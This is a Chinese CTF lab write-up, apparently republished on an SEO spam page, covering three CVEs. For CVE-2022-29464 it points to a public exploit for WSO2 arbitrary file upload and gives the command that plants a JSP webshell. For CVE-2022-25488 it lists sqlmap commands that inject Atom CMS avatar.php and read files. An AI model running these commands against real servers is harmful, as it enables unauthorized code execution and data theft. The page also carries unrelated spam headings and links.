当前位置: 首页 > wzjs >正文

成都网站优化排名推广wordpress采集功能

成都网站优化排名推广,wordpress采集功能,小程序直播开发,登录功能网站怎么做CVE-2022-29464 靶标介绍: WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。 Git…

CVE-2022-29464

靶标介绍:

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

Github下载EXP,地址:https://github.com/hakivvi/CVE-2022-29464/

执行命令:python exploit.py http://123.58.236.76:38380/ abc.jsp或者在pycharm上运行

根据返回信息可判断abc.jsp已成功上传。

浏览器直接访问返回路径,即可执行任意系统命令。

shell @ http://eci-2zefnfvpsa7cleo0wubm.cloudeci1.ichunqiu.com:9445//authenticationendpoint/abc.jsp

ls

cat /flag

CVE-2022-28060

靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

在登录点抓包

将数据包 粘贴到1.txt

CVE-2022-25488

靶标介绍:

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入之后发现是Not Found页面

访问/admin/ajax/avatar.php,发现是空白页面

查看源码

删除 avatar.php 文件发现能看到整个目录 

查看其他文件得到报错信息

测试一下注入点?id=1

源码发生了变化:

?id=1'

是字符型注入

使用 SQLMap

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"

http://www.dtcms.com/wzjs/536465.html

相关文章:

  • 网站建设用什么系统企业为什么要网站建设
  • 在家帮别人做网站赚钱.net如何兼容手机网站
  • 电子商务网站建设的一般优秀的网站建设
  • 全椒做网站网站建设进度汇报
  • 中方建设局网站在线销售型网站产品
  • 洛阳东翔科技做的网站权威的合肥网站建设
  • 怎么看网站是谁做的网站备份 ftp
  • 亚洲男女做暖网站一家专做特卖的网站
  • 设计logo网站免费横屏纯色建设网站的编程过程
  • 网站编辑信息怎么做定制做网站费用
  • 医院英文网站建设人人建站网
  • 做爰片免费网站给我看看做网站模版与定制的区别
  • 益阳网站设计公司门户网站建设周期
  • 青岛网站建设的方案桂林漓江风景图片
  • 锡林浩特本地网站建设免费跨境电商网站
  • 合肥新格建站网安徽建设工程信息平台
  • 牛 网站建设沈阳网站建设58同城
  • 天津网站优化软件深圳开发app公司
  • 以星空做的网站模板做网站维护需要什么证书
  • 佛山新网站制作机构企业网站基本信息早教
  • 网站建设 拖欠尾款北京网站开发人员
  • 网站开发用笔记本电脑制作网站的技术
  • 做视频能赚钱的网站长沙专业seo优化推荐
  • 网站建设技术合同网站ip pv
  • wordpress 移动站插件建站网站设计
  • 怎么做网站推广和宣传wordpress前台发帖
  • 阿里云网站建设部署与发布江苏网站建设网络推广
  • 设计建立企业网站最佳的公司域名托管
  • 凡科免费建站平台360未经证实的网站如何做
  • 做个 公司网站多少钱网站建设报价清单内容